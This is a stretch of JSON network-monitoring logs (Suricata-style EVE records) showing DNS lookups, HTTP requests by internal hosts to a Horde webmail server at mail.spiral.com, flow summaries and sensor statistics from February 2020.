{"timestamp":"2020-02-29T00:10:48.103585+0000","flow_id":1084958869762291,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49707,"proto":"UDP","dns":{"type":"answer","id":42796,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:48.103585+0000","flow_id":1084958869762291,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49707,"proto":"UDP","dns":{"type":"answer","id":42796,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:10:48.617584+0000","flow_id":1133320201266640,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34790,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24339}} {"timestamp":"2020-02-29T00:10:48.895655+0000","flow_id":1133320201266640,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34790,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24339},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/","state":"TRUNCATED","stored":false,"size":106496,"tx_id":1}} {"timestamp":"2020-02-29T00:10:48.905698+0000","flow_id":1715253910491618,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":38186,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":49899,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:49.013601+0000","flow_id":1715253910491618,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38186,"proto":"UDP","dns":{"type":"answer","id":49899,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:10:49.013601+0000","flow_id":1715253910491618,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38186,"proto":"UDP","dns":{"type":"answer","id":49899,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:49.043840+0000","flow_id":1133320201266640,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34790,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":629}} {"timestamp":"2020-02-29T00:10:49.043840+0000","flow_id":1133320201266640,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34790,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":629},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":29,"tx_id":2}} {"timestamp":"2020-02-29T00:10:49.089696+0000","flow_id":1133320201266640,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34790,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) 
Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":629},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":1644,"tx_id":2}} {"timestamp":"2020-02-29T00:10:49.100195+0000","flow_id":1940791233185635,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":40899,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":29779,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:49.208618+0000","flow_id":1940791233185635,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40899,"proto":"UDP","dns":{"type":"answer","id":29779,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:49.208618+0000","flow_id":1940791233185635,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40899,"proto":"UDP","dns":{"type":"answer","id":29779,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:49.242543+0000","flow_id":1095949691237231,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46147,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":58843,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:49.351235+0000","flow_id":1095949691237231,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46147,"proto":"UDP","dns":{"type":"answer","id":58843,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:10:49.351235+0000","flow_id":1095949691237231,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46147,"proto":"UDP","dns":{"type":"answer","id":58843,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:49.382937+0000","flow_id":1133320201266640,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34790,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":608}} {"timestamp":"2020-02-29T00:10:49.382937+0000","flow_id":1133320201266640,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34790,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":608},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":128,"tx_id":3}} {"timestamp":"2020-02-29T00:10:49.386643+0000","flow_id":1058609245547071,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34792,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) 
Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126}} {"timestamp":"2020-02-29T00:10:49.386643+0000","flow_id":1058609245547071,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34792,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":137,"tx_id":0}} {"timestamp":"2020-02-29T00:10:52.000233+0000","event_type":"stats","stats":{"uptime":14304,"capture":{"kernel_packets":134540,"kernel_drops":0},"decoder":{"pkts":134548,"bytes":92861724,"invalid":185,"ipv4":133067,"ipv6":8,"ethernet":134548,"raw":0,"null":0,"sll":0,"tcp":127839,"udp":5028,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095040},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2741,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2757,"synack":2748,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect
":{"alert":24},"app_layer":{"flow":{"http":1782,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2295,"failed_udp":111},"tx":{"http":4591,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2374}},"flow_mgr":{"closed_pruned":2722,"new_pruned":15,"est_pruned":2347,"bypassed_pruned":0,"flows_checked":4,"flows_notimeout":4,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65532,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20169,"memcap_state":0,"memcap_global":0},"http":{"memuse":123454,"memcap":0}}} {"timestamp":"2020-02-29T00:10:53.000434+0000","flow_id":2021948915723464,"event_type":"flow","src_ip":"192.168.10.122","src_port":38270,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:05:52.601288+0000","end":"2020-02-29T00:05:52.710276+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:10:54.387743+0000","flow_id":1133320201266640,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34790,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":608},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":1396,"tx_id":3}} 
{"timestamp":"2020-02-29T00:10:54.388545+0000","flow_id":1058609245547071,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34792,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":115,"tx_id":0}} {"timestamp":"2020-02-29T00:10:55.000722+0000","flow_id":1388849276691051,"event_type":"flow","src_ip":"192.168.10.81","src_port":52712,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":12,"pkts_toclient":16,"bytes_toserver":1776,"bytes_toclient":15021,"start":"2020-02-29T00:09:44.631403+0000","end":"2020-02-29T00:09:54.266905+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:10:57.000554+0000","flow_id":787811538317011,"event_type":"flow","src_ip":"192.168.10.122","src_port":36067,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:05:56.863955+0000","end":"2020-02-29T00:05:56.972258+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:10:57.000755+0000","flow_id":1544546121178258,"event_type":"flow","src_ip":"192.168.10.122","src_port":59017,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:05:56.679058+0000","end":"2020-02-29T00:05:56.787069+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:10:58.000714+0000","flow_id":1083094850400979,"event_type":"flow","src_ip":"192.168.10.130","src_port":34782,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":8,"bytes_toserver":1161,"bytes_toclient":6515,"start":"2020-02-29T00:09:52.520915+0000","end":"2020-02-29T00:09:57.718896+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:10:59.000187+0000","event_type":"stats","stats":{"uptime":14311,"capture":{"kernel_packets":134554,"kernel_drops":0},"decoder":{"pkts":134554,"bytes":92862120,"invalid":185,"ipv4":133073,"ipv6":8,"ethernet":134554,"raw":0,"null":0,"sll":0,"tcp":127845,"udp":5028,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093888},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2741,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2757,"synack":2748,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1782,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2295,"failed_udp":111},"tx":{"http":4591,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2374}},"flow_mgr":{"closed_pruned":2723,"new_pruned":15,"est_pruned":2348,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19179,"memcap_state":0,"memcap_global":0},"http":{"memuse":45095,"memcap":0}}} 
{"timestamp":"2020-02-29T00:11:06.000234+0000","event_type":"stats","stats":{"uptime":14318,"capture":{"kernel_packets":134554,"kernel_drops":0},"decoder":{"pkts":134554,"bytes":92862120,"invalid":185,"ipv4":133073,"ipv6":8,"ethernet":134554,"raw":0,"null":0,"sll":0,"tcp":127845,"udp":5028,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093600},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2741,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2757,"synack":2748,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1782,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2295,"failed_udp":111},"tx":{"http":4591,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2374}},"flow_mgr":{"closed_pruned":2724,"new_pruned":15,"est_pruned":2350,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19179,"memcap_state":0,"memcap_global":0},"http":{"memuse":45095,"memcap":0}}} 
{"timestamp":"2020-02-29T00:11:13.000300+0000","event_type":"stats","stats":{"uptime":14325,"capture":{"kernel_packets":134554,"kernel_drops":0},"decoder":{"pkts":134554,"bytes":92862120,"invalid":185,"ipv4":133073,"ipv6":8,"ethernet":134554,"raw":0,"null":0,"sll":0,"tcp":127845,"udp":5028,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093600},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2741,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2757,"synack":2748,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1782,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2295,"failed_udp":111},"tx":{"http":4591,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2374}},"flow_mgr":{"closed_pruned":2724,"new_pruned":15,"est_pruned":2350,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19179,"memcap_state":0,"memcap_global":0},"http":{"memuse":45095,"memcap":0}}} 
{"timestamp":"2020-02-29T00:11:13.001675+0000","flow_id":922471664245492,"event_type":"flow","src_ip":"192.168.10.130","src_port":34784,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":12,"pkts_toclient":12,"bytes_toserver":2881,"bytes_toclient":6890,"start":"2020-02-29T00:10:04.252660+0000","end":"2020-02-29T00:10:12.397842+0000","age":8,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:11:13.403835+0000","flow_id":480231771154811,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34716,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":60620,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:13.512776+0000","flow_id":480231771154811,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34716,"proto":"UDP","dns":{"type":"answer","id":60620,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:13.512776+0000","flow_id":480231771154811,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34716,"proto":"UDP","dns":{"type":"answer","id":60620,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:13.675680+0000","flow_id":1587654728744039,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52718,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7917}} {"timestamp":"2020-02-29T00:11:17.000266+0000","flow_id":1979596258201268,"event_type":"flow","src_ip":"192.168.10.130","src_port":34780,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":10,"bytes_toserver":1293,"bytes_toclient":8017,"start":"2020-02-29T00:09:40.904884+0000","end":"2020-02-29T00:10:16.599822+0000","age":36,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:11:18.677072+0000","flow_id":1587654728744039,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52718,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7917},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":44800,"tx_id":0}} {"timestamp":"2020-02-29T00:11:18.863063+0000","flow_id":1941895041657687,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54337,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":42665,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:11:18.971428+0000","flow_id":1941895041657687,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54337,"proto":"UDP","dns":{"type":"answer","id":42665,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:18.971428+0000","flow_id":1941895041657687,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54337,"proto":"UDP","dns":{"type":"answer","id":42665,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:19.028862+0000","flow_id":1212171508187051,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52720,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8528}} {"timestamp":"2020-02-29T00:11:19.245557+0000","flow_id":1212171508187051,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52720,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8528},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":36696,"tx_id":0}} 
{"timestamp":"2020-02-29T00:11:19.256442+0000","flow_id":316799676049850,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46411,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":34464,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:19.364994+0000","flow_id":316799676049850,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46411,"proto":"UDP","dns":{"type":"answer","id":34464,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:19.364994+0000","flow_id":316799676049850,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46411,"proto":"UDP","dns":{"type":"answer","id":34464,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:19.435239+0000","flow_id":1212171508187051,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52720,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":885},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":173,"tx_id":1}} 